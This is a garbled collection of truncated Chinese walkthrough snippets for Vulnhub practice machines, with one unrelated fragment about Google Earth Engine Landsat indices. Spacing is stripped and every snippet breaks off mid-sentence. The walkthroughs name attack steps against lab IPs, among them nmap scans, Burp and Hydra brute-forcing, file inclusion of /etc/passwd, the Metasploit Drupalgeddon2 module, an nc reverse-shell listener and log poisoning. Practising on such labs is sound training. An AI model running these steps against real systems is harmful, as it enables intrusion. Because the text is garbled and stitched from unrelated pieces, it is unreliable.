1.信息收集扫描主机sudoarp-scan-l扫描端口nmap-p-192.168.42.149扫描指纹whatweb192.168.42.149查看端口详细服务nmap-A-p--v192.168.42.1492.网站分析扫描目录dirbuster浏览网站,发现都是静态页面只有contact.php有上传窗口尝试上传,发现问题copyright旁的数字发生变化,猜测thankyou.php存在文件包含包含文件为footer.php3.漏洞利用开始bp测试字段(下面没图了,bp爆破,网站日志太大,无法连接蚁剑,建议大家在此靶场不要跑bp)thankyou.php?file=/ect/pass
HacksudoSearch识别目标主机IP地址(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:192.168.56.0/24|ScreenView:UniqueHosts3CapturedARPReq/Reppackets,from3hosts.Totalsize:180_____________________________________________________________________________IPAtM
1.信息收集搜索到ipsudoarp-scan-l查看ip开放端口nmap-p-192.168.42.148查找指纹,没有收获查找目录,无敏感信息2.漏洞利用访问网站,发现只有登录框,猜测为弱密码或密码爆破bp爆破成功(为了节省时间,我假设知道username,爆破真的太慢了)账号密码为adminhappy进入网站,测试功能,发现命令执行漏洞bp抓包,开始利用反弹shell(在此之前要在kali中监听)nc-lvp77773.横向渗透反弹成功,得到shell在目录中查找敏感信息,找到oldpassword九头蛇爆破jimshh密码登录ssh,jim在ssh中找到charles账号密码(因为ls
1.扫描主机sudoarp-scan-l扫描端口nmap-p-192.168.42.147扫描主机指纹,发现Drupal7cms2.得到shell(2.1,2.2)只用一种即可2.1开始msf漏洞利用mfconsolesearchdrupalsearch7600useexploit/unix/webapp/drupal_drupalgeddon2setrhosts192.168.42.147run2.2脚本exp得到反弹shell找到脚本,修改脚本,执行脚本nc监听8888端口得到反弹shellpython-c"importpty;pty.spawn('/bin/bash')"美化一下3.me
Deathnote0x01信息收集渗透的第一件事那就是信息收集,虚拟机启动起来,nmap扫一手, 192.168.56.101存在,并且开启了80和22端口,那么就访问页面。但是页面返回的结果是没找到http://deathnote.vuln这个网址 那么根据我做题的经验,这应该是需要绑定域名的,意思就是192.168.56.101跟deathnote.vuln这个域名是绑定在一起的,访问192.168.56.101就会跳转到deathnote.vuln。在windows上配置dnsC:\WINDOWS\system32\drivers\etc的hosts文件加入如下字段(linux上是/et
本文利用Landsat影像分别计算AVI\BSI和SSI,首先构建一个基本的去云和纠正函数以及影像筛选和阈值设定和指数运算的函数,然后开始进行整体运算,本文用到的函数:ee.Image.constant(value)生成一个处处包含常量值的图像。参数。value(对象)。恒定图像中的像素值。必须是一个数字或一个数组或一个数字或数组的列表。返回。图像updateMask(mask)在所有现有遮罩不为零的位置上更新图像的遮罩。输出的图像保留了输入图像的元数据和足迹。参数。this:image(Image):输入图像。mask(图像)。图像的新掩码,是[0,1]范围内的一个浮点值(无效=0,有效=1
Tomato靶场练习---低0x00部署0x01信息收集1.主机发现2.端口扫描3.信息收集(漏洞扫描)4.路径爬取5.源码分析0x02漏洞渗透1.文件包含2.写入日志反弹shell3.内核漏洞枚举4.本地提权0x00部署Tomato靶机:下载地址宿主机:kali2022目标:获取root拿到flag文件0x01信息收集1.主机发现$sudoarp-scan-l//因为靶机与宿主机在同一网段,所以用二级扫描来发现靶机ip2.端口扫描//使用namp命令,-p-指定ip,查看哪些端口开放$sudonmap-p-靶机ip$sudonmap-sC-sV-O-p21,80,2211,8888靶机ip/
一、部署方法在官网上下载靶机ova环境:https://download.vulnhub.com/harrypotter/Nagini.ova使用VMware搭建靶机环境攻击机使用VMware上搭建的kali靶机和攻击机之间使用NAT模式,保证靶机和攻击机放置于同一网段中。二、靶机下载安装靶机下载与安装参考之前文章:搭建Vulnhub靶机详细步骤三、渗透测试1.确认目标扫描网段arp-scan-l确认靶机IP:192.168.15.1342.信息收集使用nmap对靶机深度扫描nmap-A-T4-p-192.168.15.134扫描得知,靶机对外开放了22和80端口浏览器访问80端口:http:
目录一、Vulnhub靶场介绍1.靶机地址2.搭建环境二、渗透阶段 1.信息收集1.1主机发现1.2端口扫描1.3目录扫描2.漏洞利用 2.1访问目录 2.2FUZZ 模糊测试2.3登录wordpress2.4MSF反弹shell3.权限提升三、总结:一、Vulnhub靶场介绍 vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 Prime是vulnhub靶场环境的一个简单的利用靶场,Prime系列共有六个靶场,本次使用的是19年出的第一个靶
靶机地址:Venom:1~VulnHub难度:中级发布日期:2021年5月24日作者:AyushBawariya&AvnishKumar下载好靶机后解压,然后用vm直接打开即可先扫出靶机地址(靶机要用nat模式),然后nmap扫描靶机开启的端口发现开启80,21,22,443,7070和8084端口,先访问一下80端口,看看web端有什么可以利用的信息发现有一串加密的数字,用md5解密后得到hostinger,应该是用户名或者目录用dirb扫了一下没有发现有用的目录,没关系,还记得靶机开启了21端口吗,我们可以尝试登录21端口的ftp连接ftp,输入我们之前md5解密得到的值,发现果然是用户名